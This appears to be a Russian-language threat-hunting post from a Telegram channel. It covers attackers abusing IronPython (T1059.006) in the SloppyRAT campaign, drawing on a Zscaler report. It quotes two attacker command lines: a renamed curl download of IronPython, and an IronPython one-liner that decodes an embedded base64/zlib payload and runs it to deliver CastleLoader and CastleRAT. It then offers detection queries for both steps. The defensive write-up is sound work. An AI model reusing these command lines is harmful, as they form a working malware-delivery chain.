TGViewer
Know Your Adversary Know Your Adversary @knowyouradversary · 1.58K subscribers
Post #474 510
Всем привет!

Как вы знаете, злоумышленники нередко используют различные интерпретаторы команд и сценариев на различных этапах жизненного цикла атаки. Сегодня мы посмотрим на не самый распространенный пример использования Python (T1059.006).

Чтобы сформировать гипотезы для проактивного поиска, заглянем в отчет Zscaler о SloppyRAT. Нас будет интересовать, посвященная Python. Во-первых, атакующие использовали переименованную копию curl.exe для загрузки IronPython с GitHub:

"C:\Users\[redacted]\AppData\Local\9342371634011778.com" -s -L --tlsv1.2 --ssl-no-revoke -o "C:\Users\[redacted]\AppData\Local\IronPython.3.4.2.pdf" github.com/IronLanguages/ironpython3/releases/download/v3.4.2/IronPython.3.4.2.zip


В данном случае мы можем осуществлять поиск подозрительных загрузок IronPython с помощью cURL:

event_type: "processcreatewin"

AND

proc_file_originalfilename: "curl.exe"

AND

cmdline: *ironpython*


Далее атакующие использовали загруженный интерпретатор для доставки CastleLoader, и далее - CastleRAT:

"C:\Users\[redacted]\AppData\Local\IronPython.3.4.2\net462\31706105999761.exe" -c "import base64,zlib,sys,subprocess as s;s.Popen([sys.executable,'-c',zlib.decompress(base64.b64decode('eJytEtLwAUhbMW/A8FF0Bq1aeEirhpeALi4o7qw1ixdbWPLQq/eege/iJVgN4uIjmfuaM2earkVRNBYPYleci4E4Eh1kL7FiTgTU2JvYov4TPtoDfFEzEUu+mJHHIiVscJee/rCvEuUokFPjq69YXLJzv7StZjd/Y70SYe5jxtLl6CncL09xtBzi2fW26c+ITfkPSVX0luQH/FeoDd3M4P2Jzdv7s6x/41ndfSUzHwhluFByjNB828azi+souev/OZ874d8LjPL/NotmDwj+w7y88+6yh72Lkm9AzpuxcM9Q8wlX0n0e')).decode('utf-32'))]"


В этот раз можно взглянуть на подозрительные запуски IronPython с декодированием base64:

event_type: "processcreatewin"

AND

proc_file_productname: "ironpython"

AND

cmdline: "base64.b64decode"


В целом, IronPython едва ли будет использоваться среднестатистическим пользователем, следовательно, появление подобного интерпретатора на хосте уже можно считать подозрительным событием.

Скоро увидимся!

English version
More from @knowyouradversary
  1. Sep 25, 2026Всем привет! Уже на следующей неделе состоится KazHackStan 2026. В этом году я снова буду…
  2. Sep 22, 2026Всем привет! Обычно программы-вымогатели не демонстрируют применение интересных техник, но…
  3. Sep 9, 2026Всем привет! Сегодня мы поговорим о технике Direct Volume Access (T1006), которая нередко…
  4. Aug 26, 2026Всем привет! Надеюсь, вы помните, что сбор информации о скомпрометированной системе - один…
  5. Aug 23, 2026Всем привет! Сегодня поговорим о JavaScript (T1059.007) и о том, как атакующие злоупотребл…
  6. Aug 22, 2026Всем привет! Как вы наверняка знаете, техника Modify Registry (T1112) позволяет атакующим…
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →